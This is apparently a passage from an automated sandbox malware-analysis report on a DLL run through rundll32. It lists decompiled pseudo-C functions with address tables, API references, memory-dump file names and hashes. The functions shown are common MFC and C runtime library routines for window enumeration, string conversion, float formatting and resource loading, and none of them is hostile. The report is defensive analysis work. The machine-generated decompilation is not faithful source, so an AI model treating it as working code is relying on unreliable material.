                                                                                                            0x10006727
                                                                                                            0x1000672c
                                                                                                            0x10006732
                                                                                                            0x10006745
                                                                                                            0x10006790
                                                                                                            0x10006790
                                                                                                            0x00000000
                                                                                                            0x10006790
                                                                                                            0x10006752
                                                                                                            0x10006756
                                                                                                            0x10006758
                                                                                                            0x10006759
                                                                                                            0x1000675c
                                                                                                            0x10006762
                                                                                                            0x10006765
                                                                                                            0x1000677d
                                                                                                            0x1000677d
                                                                                                            0x10006783
                                                                                                            0x1000678b
                                                                                                            0x00000000
                                                                                                            0x1000678b
                                                                                                            0x1000671d
                                                                                                            0x1000671f
                                                                                                            0x10006722
                                                                                                            0x10006725
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10006725
                                                                                                            0x10006799

                                                                                                            APIs
                                                                                                            • EnableMenuItem.USER32 ref: 10006745
                                                                                                              • Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
                                                                                                              • Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F
                                                                                                            • GetFocus.USER32 ref: 1000675C
                                                                                                            • GetParent.USER32(?), ref: 1000676A
                                                                                                            • SendMessageA.USER32(?,00000028,00000000,00000000), ref: 1000677D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: EnableException@8FocusH_prolog3ItemMenuMessageParentSendThrow
                                                                                                            • String ID:
                                                                                                            • API String ID: 3849708097-0
                                                                                                            • Opcode ID: da181488fd32ae85599c137ac0e4151e4cf157de9effc839c6b85ff350a25f58
                                                                                                            • Instruction ID: e2afc09dcdd242cfcc452f6720a74c3cb54d3460b69826f3dc14470d92f8e7be
                                                                                                            • Opcode Fuzzy Hash: da181488fd32ae85599c137ac0e4151e4cf157de9effc839c6b85ff350a25f58
                                                                                                            • Instruction Fuzzy Hash: 88118E71504611EFE721DF20CC8881AB7F6FF88399B21CA2DF15A46969CB30BC44CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000B21C Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 77%
                                                                                                            			E1000B21C(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t16;
				struct HWND__* _t18;
				struct HWND__* _t20;
				void* _t22;
				void* _t23;
				void* _t24;
				struct HWND__* _t25;

				_t23 = __ecx;
				_t22 = __ebx;
				_t24 = GetTopWindow;
				_t16 = GetTopWindow(_a4);
				while(1) {
					_t25 = _t16;
					if(_t25 == 0) {
						break;
					}
					__eflags = _a24;
					if(__eflags == 0) {
						SendMessageA(_t25, _a8, _a12, _a16);
					} else {
						_t20 = E1000A917(_t23, _t24, _t25, __eflags, _t25);
						__eflags = _t20;
						if(__eflags != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x20)));
							_push(_t20);
							E1000AF41(_t22, _t24, _t25, __eflags);
						}
					}
					__eflags = _a20;
					if(_a20 != 0) {
						_t18 = GetTopWindow(_t25);
						__eflags = _t18;
						if(_t18 != 0) {
							E1000B21C(_t22, _t23, _t25, _a8, _a12, _a16, _a20, _a24);
						}
					}
					_t16 = GetWindow(_t25, 2);
				}
				return _t16;
			}













                                                                                                            0x1000b21c
                                                                                                            0x1000b21c
                                                                                                            0x1000b224
                                                                                                            0x1000b22a
                                                                                                            0x1000b28d
                                                                                                            0x1000b28d
                                                                                                            0x1000b291
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000b22e
                                                                                                            0x1000b232
                                                                                                            0x1000b25c
                                                                                                            0x1000b234
                                                                                                            0x1000b235
                                                                                                            0x1000b23a
                                                                                                            0x1000b23c
                                                                                                            0x1000b23e
                                                                                                            0x1000b241
                                                                                                            0x1000b244
                                                                                                            0x1000b247
                                                                                                            0x1000b24a
                                                                                                            0x1000b24b
                                                                                                            0x1000b24b
                                                                                                            0x1000b23c
                                                                                                            0x1000b262
                                                                                                            0x1000b266
                                                                                                            0x1000b269
                                                                                                            0x1000b26b
                                                                                                            0x1000b26d
                                                                                                            0x1000b27f
                                                                                                            0x1000b27f
                                                                                                            0x1000b26d
                                                                                                            0x1000b287
                                                                                                            0x1000b287
                                                                                                            0x1000b296

                                                                                                            APIs
                                                                                                            • GetTopWindow.USER32(?), ref: 1000B22A
                                                                                                            • GetTopWindow.USER32(00000000), ref: 1000B269
                                                                                                            • GetWindow.USER32(00000000,00000002), ref: 1000B287
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window
                                                                                                            • String ID:
                                                                                                            • API String ID: 2353593579-0
                                                                                                            • Opcode ID: e0b1c7dcaef5420272ec71e23bd9130895c4420cb30c111c889f194c57433dfc
                                                                                                            • Instruction ID: bb9f297338e09c47c4769c98d14c4203ded29529c07ae9fe16b63de4f6ec589b
                                                                                                            • Opcode Fuzzy Hash: e0b1c7dcaef5420272ec71e23bd9130895c4420cb30c111c889f194c57433dfc
                                                                                                            • Instruction Fuzzy Hash: 0301E93600191ABBEF13AF908C05E9F3B65EF493D0F018114FA1055065C736CA61EFA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10010AF2 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 50%
                                                                                                            			E10010AF2(short* _a4) {
				char* _v0;
				int _v8;
				int _v16;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t6;
				char* _t7;
				void* _t12;
				char* _t13;
				void* _t15;
				void* _t16;
				short* _t20;

				_t20 = _a4;
				if(_t20 != 0) {
					__imp__#7(_t20, _t16, _t12);
					_v8 = _t6;
					_t7 = WideCharToMultiByte(0, 0, _t20, _t6, 0, 0, 0, 0);
					_v0 = _t7;
					__imp__#150(0, _t7);
					_t13 = _t7;
					__eflags = _t13;
					if(__eflags == 0) {
						E10004E3A(_t13, _t15, WideCharToMultiByte, 0, __eflags);
					}
					WideCharToMultiByte(0, 0, _t20, _v16, _t13, _v8, 0, 0);
					return _t13;
				}
				return 0;
			}


















                                                                                                            0x10010af4
                                                                                                            0x10010afd
                                                                                                            0x10010b06
                                                                                                            0x10010b1a
                                                                                                            0x10010b1e
                                                                                                            0x10010b22
                                                                                                            0x10010b26
                                                                                                            0x10010b2c
                                                                                                            0x10010b2e
                                                                                                            0x10010b30
                                                                                                            0x10010b32
                                                                                                            0x10010b32
                                                                                                            0x10010b45
                                                                                                            0x00000000
                                                                                                            0x10010b4a
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • SysStringLen.OLEAUT32(?), ref: 10010B06
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,1001D033,00000000,00000018,1001D379), ref: 10010B1E
                                                                                                            • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 10010B26
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,0000000C,1001D033,00000000,00000018,1001D379), ref: 10010B45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Byte$CharMultiStringWide$Alloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 3384502665-0
                                                                                                            • Opcode ID: 2aaaeee83b87f37a7c2fa2b797ecf6177c1475c8e7f20f5b86dc05104e7f5898
                                                                                                            • Instruction ID: c024efa3420e83baabe874ecab196389fa921329a1610a927b319e642033d1fa
                                                                                                            • Opcode Fuzzy Hash: 2aaaeee83b87f37a7c2fa2b797ecf6177c1475c8e7f20f5b86dc05104e7f5898
                                                                                                            • Instruction Fuzzy Hash: BCF0127120A2747FD2225B668C8CC9BBF9CFF8A2E97124529F58996101D6759900C6F1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000ABDB Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 96%
                                                                                                            			E1000ABDB(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t9;
				struct HWND__* _t10;
				void* _t14;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				void* _t18;

				_t14 = __ecx;
				_t13 = __ebx;
				_t9 = GetDlgItem(_a4, _a8);
				_t15 = GetTopWindow;
				_t16 = _t9;
				if(_t16 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t17 = _t10;
						__eflags = _t17;
						if(_t17 == 0) {
							goto L10;
						}
						_t10 = E1000ABDB(_t13, _t14, _t17, _a8, _a12);
						__eflags = _t10;
						if(_t10 == 0) {
							_t10 = GetWindow(_t17, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t16) == 0) {
						L3:
						_push(_t16);
						if(_a12 == 0) {
							return E1000A8F0(_t13, _t14, _t18);
						}
						_t10 = E1000A917(_t14, _t15, _t16, __eflags);
						__eflags = _t10;
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E1000ABDB(__ebx, _t14, _t16, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}













                                                                                                            0x1000abdb
                                                                                                            0x1000abdb
                                                                                                            0x1000abe6
                                                                                                            0x1000abec
                                                                                                            0x1000abf2
                                                                                                            0x1000abf6
                                                                                                            0x1000ac26
                                                                                                            0x1000ac29
                                                                                                            0x1000ac46
                                                                                                            0x1000ac46
                                                                                                            0x1000ac48
                                                                                                            0x1000ac4a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000ac34
                                                                                                            0x1000ac39
                                                                                                            0x1000ac3b
                                                                                                            0x1000ac40
                                                                                                            0x00000000
                                                                                                            0x1000ac40
                                                                                                            0x00000000
                                                                                                            0x1000ac3b
                                                                                                            0x1000abf8
                                                                                                            0x1000abfd
                                                                                                            0x1000ac0f
                                                                                                            0x1000ac13
                                                                                                            0x1000ac14
                                                                                                            0x00000000
                                                                                                            0x1000ac16
                                                                                                            0x1000ac1d
                                                                                                            0x1000ac22
                                                                                                            0x1000ac24
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000abff
                                                                                                            0x1000ac06
                                                                                                            0x1000ac0d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000ac0d
                                                                                                            0x1000abfd
                                                                                                            0x1000ac4f
                                                                                                            0x1000ac4f

                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32 ref: 1000ABE6
                                                                                                            • GetTopWindow.USER32(00000000), ref: 1000ABF9
                                                                                                              • Part of subcall function 1000ABDB: GetWindow.USER32(00000000,00000002), ref: 1000AC40
                                                                                                            • GetTopWindow.USER32(?), ref: 1000AC29
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Item
                                                                                                            • String ID:
                                                                                                            • API String ID: 369458955-0
                                                                                                            • Opcode ID: ce071e9538a02d42f810a6b21320928da7b329cf863030978907d6d72f575913
                                                                                                            • Instruction ID: cd43aa0fe87982c1d24f281b623a533cfa4df9f459eb7cb89b98fbb4107c1cf3
                                                                                                            • Opcode Fuzzy Hash: ce071e9538a02d42f810a6b21320928da7b329cf863030978907d6d72f575913
                                                                                                            • Instruction Fuzzy Hash: F7016236501666ABFB239F518D00E8F3A99EF0B3E0F038220FD005612AE731D9D19AE5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002BCC5 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1002BCC5(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;
				void* _t29;

				_t28 = __ebx;
				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E1002B5C2(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E1002B6AE(_t28, _t29, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E1002BBCD(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E1002BB14(_t29, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}







                                                                                                            0x1002bcc5
                                                                                                            0x1002bcc8
                                                                                                            0x1002bcce
                                                                                                            0x1002bd41
                                                                                                            0x00000000
                                                                                                            0x1002bcd5
                                                                                                            0x1002bcd5
                                                                                                            0x1002bcd8
                                                                                                            0x1002bcf3
                                                                                                            0x1002bcf6
                                                                                                            0x1002bd16
                                                                                                            0x1002bd28
                                                                                                            0x1002bcf8
                                                                                                            0x1002bcf8
                                                                                                            0x1002bcfb
                                                                                                            0x00000000
                                                                                                            0x1002bcfd
                                                                                                            0x1002bd0f
                                                                                                            0x1002bd0f
                                                                                                            0x1002bcfb
                                                                                                            0x1002bd46
                                                                                                            0x1002bd4a
                                                                                                            0x1002bcda
                                                                                                            0x1002bcf2
                                                                                                            0x1002bcf2
                                                                                                            0x1002bcd8

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                            • String ID:
                                                                                                            • API String ID: 3016257755-0
                                                                                                            • Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                            • Instruction ID: 3b922080ff75e98142c472849b9f5e6d9f0d2bf6741c52107cc94376e2c1784d
                                                                                                            • Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                            • Instruction Fuzzy Hash: C9014B3680058EBBCF129E84EC418EE3F62FF19390F948455FE1959031D736D9B1AB81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10029AD3 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 89%
                                                                                                            			E10029AD3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x10041648);
				E10022714(__ebx, __edi, __esi);
				_t31 = E10025E70(__edx, __edi, _t35);
				_t15 =  *0x100461fc; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E10023FE8(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x10046100; // 0xbf1330
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x10045cd8;
								if(__eflags != 0) {
									_push(_t33);
									E1001F6F4(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x10046100; // 0xbf1330
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x10046100; // 0xbf1330
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E10029B6E();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E10020BB5(_t25, _t29, _t31, 0x20);
				}
				return E10022759(_t33);
			}










                                                                                                            0x10029ad3
                                                                                                            0x10029ad3
                                                                                                            0x10029ad3
                                                                                                            0x10029ad3
                                                                                                            0x10029ad5
                                                                                                            0x10029ada
                                                                                                            0x10029ae4
                                                                                                            0x10029ae6
                                                                                                            0x10029aee
                                                                                                            0x10029b0f
                                                                                                            0x10029b15
                                                                                                            0x10029b19
                                                                                                            0x10029b1c
                                                                                                            0x10029b1f
                                                                                                            0x10029b25
                                                                                                            0x10029b27
                                                                                                            0x10029b29
                                                                                                            0x10029b2c
                                                                                                            0x10029b32
                                                                                                            0x10029b34
                                                                                                            0x10029b36
                                                                                                            0x10029b3c
                                                                                                            0x10029b3e
                                                                                                            0x10029b3f
                                                                                                            0x10029b44
                                                                                                            0x10029b3c
                                                                                                            0x10029b34
                                                                                                            0x10029b45
                                                                                                            0x10029b4a
                                                                                                            0x10029b4d
                                                                                                            0x10029b53
                                                                                                            0x10029b57
                                                                                                            0x10029b57
                                                                                                            0x10029b5d
                                                                                                            0x10029b64
                                                                                                            0x10029af6
                                                                                                            0x10029af6
                                                                                                            0x10029af6
                                                                                                            0x10029afb
                                                                                                            0x10029aff
                                                                                                            0x10029b04
                                                                                                            0x10029b0c

                                                                                                            APIs
                                                                                                              • Part of subcall function 10025E70: __getptd_noexit.LIBCMT ref: 10025E71
                                                                                                              • Part of subcall function 10025E70: __amsg_exit.LIBCMT ref: 10025E7E
                                                                                                            • __amsg_exit.LIBCMT ref: 10029AFF
                                                                                                            • __lock.LIBCMT ref: 10029B0F
                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 10029B2C
                                                                                                            • InterlockedIncrement.KERNEL32(00BF1330), ref: 10029B57
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 2880340415-0
                                                                                                            • Opcode ID: 56d065f265e4a70fe3f7ed656445acff29df91b79a35f532556a78a06cb7d754
                                                                                                            • Instruction ID: 7e2233ef4788b528b7c8923621eb479d41e657301323debbe484897fd832dd33
                                                                                                            • Opcode Fuzzy Hash: 56d065f265e4a70fe3f7ed656445acff29df91b79a35f532556a78a06cb7d754
                                                                                                            • Instruction Fuzzy Hash: 8D01D235900721EBDB43DB64B94574EB3A0FF09790F954014E804AB6A2D774BD81DFDA
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000D4E7 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1000D4E7(void* __ecx, CHAR* _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HRSRC__* _t8;
				void* _t9;
				void* _t11;
				void* _t14;
				void* _t15;
				void* _t16;
				struct HINSTANCE__* _t17;
				void* _t18;

				_t14 = 0;
				_t11 = 0;
				_t19 = _a4;
				_t18 = __ecx;
				if(_a4 == 0) {
					L4:
					_t16 = E1000D09E(_t11, _t18, _t11);
					if(_t11 != 0 && _t14 != 0) {
						FreeResource(_t14);
					}
					return _t16;
				}
				_t17 =  *(E1000EC09(0, 0, _t15, _t19) + 0xc);
				_t8 = FindResourceA(_t17, _a4, 0xf0);
				if(_t8 == 0) {
					goto L4;
				}
				_t9 = LoadResource(_t17, _t8);
				_t14 = _t9;
				if(_t14 != 0) {
					_t11 = LockResource(_t14);
					goto L4;
				}
				return _t9;
			}















                                                                                                            0x1000d4eb
                                                                                                            0x1000d4ed
                                                                                                            0x1000d4ef
                                                                                                            0x1000d4f3
                                                                                                            0x1000d4f5
                                                                                                            0x1000d52a
                                                                                                            0x1000d534
                                                                                                            0x1000d536
                                                                                                            0x1000d53d
                                                                                                            0x1000d53d
                                                                                                            0x00000000
                                                                                                            0x1000d543
                                                                                                            0x1000d4fc
                                                                                                            0x1000d509
                                                                                                            0x1000d511
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000d515
                                                                                                            0x1000d51b
                                                                                                            0x1000d51f
                                                                                                            0x1000d528
                                                                                                            0x00000000
                                                                                                            0x1000d528
                                                                                                            0x1000d549

                                                                                                            APIs
                                                                                                            • FindResourceA.KERNEL32(?,?,000000F0), ref: 1000D509
                                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,?,?,10007D86,?,?,10004C5C,6A53A566), ref: 1000D515
                                                                                                            • LockResource.KERNEL32(00000000,?,?,?,?,10007D86,?,?,10004C5C,6A53A566), ref: 1000D522
                                                                                                            • FreeResource.KERNEL32(00000000,?,?,?,?,10007D86,?,?,10004C5C,6A53A566), ref: 1000D53D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
